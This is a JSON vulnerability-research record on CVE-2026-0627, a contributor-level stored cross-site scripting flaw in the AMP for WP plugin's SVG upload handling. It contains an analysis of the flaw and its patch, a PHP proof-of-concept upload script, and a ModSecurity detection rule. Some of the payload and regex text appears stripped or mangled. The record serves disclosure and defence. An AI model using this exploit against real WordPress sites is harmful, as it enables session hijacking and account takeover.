```json
{
  "analysis": "Atomic Edge analysis of CVE-2026-0627:\nThe AMP for WordPress plugin, versions 1.1.10 and earlier, contains an authenticated stored cross-site scripting vulnerability. The vulnerability resides in the plugin's SVG file upload sanitization function. Attackers with Contributor-level access or higher can upload malicious SVG files containing JavaScript payloads that execute when the file is viewed. The CVSS score of 6.4 reflects the authentication requirement and the potential impact on site integrity.\n\nThe root cause is insufficient sanitization in the ampforwp_sanitize_svg_file function within accelerated-mobile-pages/templates/features.php. The vulnerable version only removes script tags, using a simple regex pattern (line 10373: preg_replace('/]*>(.*?)/is', '', $svg_content)). This approach fails to address other XSS vectors, including event handler attributes (onload, onerror, onmouseover), foreignObject elements, and SVG animation attributes. The function ampforwp_sanitize_svg_upload (lines 10340-10354) triggers this sanitization based only on MIME type detection, without comprehensive content validation.\n\nExploitation requires an authenticated attacker with at least Contributor privileges to upload an SVG file through the WordPress media upload interfaces. The attacker crafts an SVG containing XSS payloads using event handlers like onload=\"alert(document.cookie)\" within SVG elements, foreignObject elements containing HTML/JavaScript, or SVG animation attributes with embedded scripts. When any user views the uploaded SVG file directly, or when it is embedded in a page, the malicious JavaScript executes in the victim's browser context.\n\nThe patch in version 1.1.11 completely rewrites the sanitization logic. It replaces the single regex pattern with a multi-layered approach using DOMDocument when available (lines 10389-196). The new ampforwp_sanitize_svg_file function now removes script tags, foreignObject elements, and event handler attributes via XPath queries. A fallback function, ampforwp_sanitize_svg_fallback, provides regex-based sanitization when DOMDocument is unavailable. The patch also adds MIME type and file extension validation, introduces a filter hook for controlled bypass, and extends sanitization to existing files during updates via the wp_handle_upload filter.\n\nSuccessful exploitation allows attackers to inject arbitrary JavaScript that executes in the context of any user viewing the malicious SVG. This can lead to session hijacking, administrative account takeover, content defacement, or redirection to malicious sites. Since the payload is stored in the WordPress media library, it persists across sessions and affects all users who access the file, making this a persistent threat vector.",
  "poc_php": "// Atomic Edge CVE Research - Proof of Concept\n// CVE-2026-0627 - AMP for WP <= 1.1.10 - Authenticated (Contributor+) Stored Cross-Site Scripting via SVG File Upload\n<?php\n\n$target_url = 'http://vulnerable-wordpress-site.com';\n$username = 'contributor_user';\n$password = 'contributor_password';\n\n// Malicious SVG with multiple XSS vectors\n$svg_payload = '\n\n \n \n \n alert(\\'XSS via foreignObject\\')\n \n \n \n';\n\n// Create temporary file for upload\n$tmp_file = tempnam(sys_get_temp_dir(), 'xss_');\nfile_put_contents($tmp_file, $svg_payload);\n\n// Initialize cURL session for login\n$ch = curl_init();\ncurl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');\ncurl_setopt($ch, CURLOPT_POST, 1);\ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([\n    'log' => $username,\n    'pwd' => $password,\n    'wp-submit' => 'Log In',\n    'redirect_to' => $target_url . '/wp-admin/',\n    'testcookie' => '1'\n]));\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\ncurl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');\ncurl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');\ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\n$response = curl_exec($ch);\n\n// Check if login succeeded by looking for dashboard elements\nif (strpos($response, 'wp-admin-bar') === false) {\n    echo \"Login failed. Check credentials.\\n\";\n    exit;\n}\n\necho \"Logged in successfully.\\n\";\n\n// Get nonce for media upload (from AJAX endpoint)\ncurl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');\ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([\n    'action' => 'wp-ajax-upload-attachment'\n]));\n$ajax_response = curl_exec($ch);\n\n// Extract nonce from page (simplified - a real implementation would parse the HTML)\n// For demonstration, we'll use a placeholder\n$upload_nonce = 'media_upload_nonce_placeholder';\n\n// Prepare file upload\n$post_data = [\n    'name' => 'xss.svg',\n    'action' => 'upload-attachment',\n    '_wpnonce' => $upload_nonce,\n    'async-upload' => new CURLFile($tmp_file, 'image/svg+xml', 'xss.svg')\n];\n\ncurl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/async-upload.php');\ncurl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);\n$upload_response = curl_exec($ch);\n\n// Check upload success\nif (strpos($upload_response, 'success') !== false || strpos($upload_response, 'url') !== false) {\n    echo \"SVG file uploaded successfully.\\n\";\n    echo \"Payload will execute when users view the uploaded SVG file.\\n\";\n\n    // Extract file URL from response (simplified)\n    preg_match('/\"url\":\"([^\"]+)\"/', $upload_response, $matches);\n    if (!empty($matches[1])) {\n        $svg_url = stripslashes($matches[1]);\n        echo \"SVG accessible at: \" . $svg_url . \"\\n\";\n        echo \"Visit this URL to trigger the XSS payload.\\n\";\n    }\n} else {\n    echo \"Upload failed. Response: \" . substr($upload_response, 0, 200) . \"...\\n\";\n}\n\n// Cleanup\ncurl_close($ch);\nunlink($tmp_file);\n\n?>",
  "modsecurity_rule": "# Atomic Edge WAF Rule - CVE-2026-0627\nSecRule REQUEST_URI \"@streq /wp-admin/async-upload.php\" \\\n    \"id:1000627,phase:2,deny,status:403,chain,msg:'CVE-2026-0627: AMP for WP SVG XSS upload attempt',severity:'CRITICAL',tag:'CVE-2026-0627',tag:'WordPress',tag:'AMP-for-WP',tag:'XSS'\"\n    SecRule FILES \"@rx \\\\.svg$\" \"chain\"\n    SecRule FILES_TMP_CONTENT \"@rx (?i)(on[a-z]+\\\\s*=|foreignObject|]*>|]*onbegin)\" \\\n        \"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E\""
}
```